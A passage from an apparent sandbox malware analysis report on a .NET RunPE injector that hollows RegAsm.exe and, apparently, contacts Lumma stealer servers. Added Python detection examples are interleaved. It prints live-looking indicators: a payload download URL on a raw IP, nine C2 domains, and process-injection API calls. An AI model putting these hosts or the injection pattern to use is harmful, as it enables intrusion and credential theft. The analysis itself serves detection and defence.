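    machine, nsect, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", body, e_lfanew + 4)
    opt = e_lfanew + 24
    subsystem, dll_chars = struct.unpack_from("<HH", body, opt + 68)  # same offset in PE32 and PE32+
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i
        if off + 40 > len(body):
            break  # truncated capture: keep what is there
        name, _vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", body, off)
        sections.append((name.rstrip(b"\x00").decode("ascii", "replace"), va, raw_size, raw_ptr))
    compiled = datetime.fromtimestamp(ts, tz=timezone.utc)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "is_dll": bool(chars & 0x2000),
        "subsystem": subsystem,
        "dll_characteristics": dll_chars,
        "compiled": compiled,
        "timestamp_utc": compiled.isoformat(),
        "sections": [s[0] for s in sections],
        # file size implied by the section table: highest raw offset plus size
        "file_span": max((p + r for _, _, r, p in sections), default=0),
    }


def assess_download(headers: dict, body: bytes) -> dict:
    """Flag an HTTP response carrying a PE (what the sandbox's 'Downloads executable
    code via HTTP' signature reports) and attach the facts a responder wants next."""
    h = {k.lower(): v for k, v in headers.items()}
    info = parse_pe_header(body)
    reasons = []
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype in EXECUTABLE_MIME:
        reasons.append(f"Content-Type advertises an executable ({ctype})")
    if info:
        kind = "DLL" if info["is_dll"] else "EXE"
        reasons.append(f"body is a {info['machine']} {kind} compiled {info['timestamp_utc']}")
        declared = int(h.get("content-length", "0") or 0)
        if declared and info["file_span"] == declared:
            reasons.append("section table ends exactly at the declared Content-Length")
        if "last-modified" in h:
            lead = parsedate_to_datetime(h["last-modified"]) - info["compiled"]
            reasons.append(f"compiled {lead.total_seconds() / 3600:.1f} h before Last-Modified")
    return {"is_pe": info is not None, "reasons": reasons, "pe": info}


def build_sample_body() -> bytes:
    """Constructed stand-in for the first 0x210 bytes of u888.exe, re-packed from the
    field values visible in the report's Data Raw dump. Data directories are zeroed and
    the remaining bytes of the 274432-byte file are not reproduced."""
    hdr = bytearray(0x78)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x78)  # e_lfanew
    hdr[0x40:0x4E] = bytes.fromhex("0e1fba0e00b409cd21b8014ccd21")  # DOS stub code
    hdr[0x4E:0x76] = b"This program cannot be run in DOS mode.$"
    coff = struct.pack("<4sHHIIIHH", b"PE\x00\x00", 0x14C, 4, 0x66CCECB3, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
                      0x10B, 14, 0, 0x36600, 0xC600, 0, 0x9930, 0x1000, 0, 0x400000, 0x1000, 0x200,
                      6, 0, 0, 0, 6, 0, 0, 0x4F000, 0x400, 0, 2, 0x8540,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + bytes(16 * 8)
    secs = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, va, raw, ptr, 0, 0, 0, 0, flags)
        for name, vsize, va, raw, ptr, flags in [
            (b".text", 0x3649C, 0x1000, 0x36600, 0x400, 0x60000020),
            (b".rdata", 0x2855, 0x38000, 0x2A00, 0x36A00, 0x40000040),
            (b".data", 0xED5C, 0x3B000, 0x5800, 0x39400, 0xC0000040),
            (b".reloc", 0x4240, 0x4A000, 0x4400, 0x3EC00, 0x42000040),
        ])
    return bytes(hdr) + coff + opt + secs


# Response headers as printed in the report's HTTP traffic line.
SAMPLE_HEADERS = {"Server": "Apache/2.4.52 (Ubuntu)", "Content-Type": "application/x-msdos-program",
                  "Content-Length": "274432", "Last-Modified": "Tue, 27 Aug 2024 16:37:44 GMT"}

if __name__ == "__main__":
    for r in assess_download(SAMPLE_HEADERS, build_sample_body())["reasons"]:
        print("-", r)
```

The Content-Type check alone is weak (a server can label a PE as anything, and the u888.exe name is equally disposable); the MZ/PE parse is what holds, and the section-table span versus Content-Length tells you whether the proxy saw the whole file or a truncated one before you go looking for it on disk.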
    Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131 (reported 50 times)
    Source: global traffic | HTTP traffic detected: GET /files/u888.exe HTTP/1.1; Host: 147.45.44.131; Connection: Keep-Alive
    Source: global traffic | DNS traffic detected: DNS query: miracledzmnqwui.shop
    Source: global traffic | DNS traffic detected: DNS query: locatedblsoqp.shop
    Source: global traffic | DNS traffic detected: DNS query: traineiwnqo.shop
    Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: miracledzmnqwui.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.0000000002781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131/files/u888.exe
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.0000000002781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131/files/u888.exeP
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://traineiwnqo.shop/
    Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://traineiwnqo.shop/&%
    Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://traineiwnqo.shop/.%
    Source: RegAsm.exe, 00000003.00000002.1292012501.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1291749878.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://traineiwnqo.shop/api
    Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://traineiwnqo.shop/apim
    Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.2
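Three things in the traffic above are worth turning into detection logic. The check-in is a POST to /api with an 8-byte application/x-www-form-urlencoded body and a Chrome 119 User-Agent, but with none of the Accept, Accept-Language or Accept-Encoding headers a real Chrome form POST carries. The decrypted strings give the format of the later requests (lid=%s&j=%s&ver=4.0) and the hard-coded TeslaBrowser/5.5 User-Agent that the Malpedia description mentions. And the extracted configuration gives the nine C2 hosts. The Python below is an added example, not Suricata's or Joe Sandbox's logic: it scores HTTP request records with both the exact indicators from this report and the behavioural pattern. The records are constructed: the first mirrors the captured POST (its 8-byte body was not printed in the report and is left empty), the second is a hypothetical later request built from the decrypted format string, the third is benign.

```python
import re

# Indicators taken from this report: extracted C2 list, build id, and the
# decrypted strings "TeslaBrowser/5.5" and "lid=%s&j=%s&ver=4.0".
C2_DOMAINS = {
    "condedqpwqm.shop", "stagedchheiqwo.shop", "stamppreewntnq.shop",
    "traineiwnqo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop",
    "miracledzmnqwui.shop", "caffegclasiqwp.shop", "millyscroqwp.shop",
}
BUILD_ID = "WpM2Co--SUSELL"
LUMMA_UA = "TeslaBrowser/5.5"
LUMMA_BODY = re.compile(r"^lid=[^&]+&j=[^&]*&ver=\d+\.\d+$")
# Headers a real Chrome form POST carries; a "Chrome" UA without any of them is
# the tell in the observed check-ins (heuristic chosen for this example).
CHROME_BASELINE = {"accept", "accept-language", "accept-encoding"}
ALERT_THRESHOLD = 8
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


def score_request(rec: dict) -> tuple[int, list[str]]:
    """Score one request record {method, host, path, headers, body}; higher is worse."""
    hdr = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    host = rec.get("host", "").lower()
    body = rec.get("body") or ""
    score, why = 0, []

    # Exact indicators from the extracted configuration and decrypted strings.
    if host in C2_DOMAINS:
        score += 10
        why.append(f"host {host} is in the extracted C2 list")
    if hdr.get("user-agent") == LUMMA_UA:
        score += 10
        why.append("User-Agent is the hard-coded TeslaBrowser/5.5")
    if LUMMA_BODY.match(body):
        score += 8
        why.append("body matches the decrypted lid=/j=/ver= format")
    if BUILD_ID in body:
        score += 10
        why.append("body carries this sample's build id")

    # Behavioural pattern of the observed check-ins; survives domain rotation.
    ctype = hdr.get("content-type", "").split(";")[0].strip().lower()
    clen = int(hdr.get("content-length", "0") or 0)
    if (rec.get("method") == "POST" and rec.get("path") == "/api"
            and ctype == "application/x-www-form-urlencoded" and 0 < clen <= 16):
        score += 4
        why.append(f"POST /api with a {clen}-byte form body")
    if "Chrome/" in hdr.get("user-agent", "") and not CHROME_BASELINE.issubset(hdr):
        score += 3
        why.append("Chrome User-Agent but none of Chrome's baseline request headers")
    return score, why


def flag_requests(records: list[dict]) -> list[tuple[int, int, list[str]]]:
    """Return (index, score, reasons) for every record at or above the alert threshold."""
    flagged = []
    for i, rec in enumerate(records):
        score, why = score_request(rec)
        if score >= ALERT_THRESHOLD:
            flagged.append((i, score, why))
    return flagged


# Constructed records (see the lead-in for what each one stands for).
LATER_BODY = f"lid={BUILD_ID}&j=hypothetical&ver=4.0"  # hypothetical instance of the format string
SAMPLE_REQUESTS = [
    {"method": "POST", "host": "miracledzmnqwui.shop", "path": "/api",
     "headers": {"Connection": "Keep-Alive", "Content-Type": "application/x-www-form-urlencoded",
                 "User-Agent": CHROME_UA, "Content-Length": "8", "Host": "miracledzmnqwui.shop"},
     "body": None},
    {"method": "POST", "host": "traineiwnqo.shop", "path": "/api",
     "headers": {"Content-Type": "application/x-www-form-urlencoded", "User-Agent": LUMMA_UA,
                 "Content-Length": str(len(LATER_BODY))},
     "body": LATER_BODY},
    {"method": "POST", "host": "api.example.com", "path": "/api",
     "headers": {"Content-Type": "application/json", "Content-Length": "19", "User-Agent": CHROME_UA,
                 "Accept": "*/*", "Accept-Language": "en-US", "Accept-Encoding": "gzip"},
     "body": '{"query": "status"}'},
]

if __name__ == "__main__":
    for i, score, why in flag_requests(SAMPLE_REQUESTS):
        print(f"record {i}: score {score}: " + "; ".join(why))
```

The exact indicators rot quickly (Lumma rotates its .shop domains per build), so the behavioural half is the durable part, and on its own it is noisy on legitimate tiny form posts; use it to enrich rather than block. Note also that these check-ins ran over TLS 1.2 to Cloudflare edges (188.114.96.3 and 188.114.97.3), so the HTTP fields are only visible with TLS inspection on the client side; without it, the DNS and SNI rules listed above are the detection hooks.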
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004297F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004091D0 appears 44 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004099A0 appears 105 times
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1252293838.00000000009CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000000.1232989270.00000000004C6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameConsoleApp66.exe: vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Binary or memory string: OriginalFilenameConsoleApp66.exe: vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Settings.cs | Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@5/1@3/3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0042EB21 SysAllocString, CoSetProxyBlanket, SysAllocString, SysAllocString, SysFreeString, SysFreeString, SysFreeString, SysFreeString, GetVolumeInformationW, CoCreateInstance, CoCreateInstance
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe.log
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Mutant created: NULL
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: mscoree.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: rasapi32.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: rasman.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: rtutils.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\ConsoleApp66.pdb | source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Static PE information: 0x8B22E0EF [Mon Dec 21 13:53:51 2043 UTC]
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Code function: 0_2_00CF2298 push edx; retf 5500h 0_2_00CF2586
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Code function: 0_2_00CF05C9 push esp; retf 0000h 0_2_00CF05CA
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Code function: 0_2_00CF0598 push esp; retf 0000h 0_2_00CF05BA
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Code function: 0_2_00CF0505 push eax; retf 0000h 0_2_00CF050A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Code function: 0_2_00CF0605 push esp; retf 0000h 0_2_00CF060A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0043DABC push eax; retn 0041h 3_2_0043DABD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0043D5A0 push edi; retn 0041h 3_2_0043D5A1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0043D63E push eax; iretd 3_2_0043D669
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory allocated: CF0000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory allocated: 2780000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory allocated: 4780000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Window / User API: threadDelayed 3224
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Window / User API: threadDelayed 1173
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6756 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 5920 | Thread sleep count: 3224 > 30
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 5920 | Thread sleep count: 1173 > 30
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6328 | Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6820 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6692 | Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6720 | Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`3
    Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1252293838.0000000000A03000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEE
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Process information queried: ProcessInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00433FA0 LdrInitializeThunk
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Process token adjusted: Debug
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs | Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs | Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Modules.cs | Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, massiv, bufferSize, ref bytesRead)
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: caffegclasiqwp.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: stamppreewntnq.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: stagedchheiqwo.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: millyscroqwp.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: evoliutwoqm.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: condedqpwqm.shop
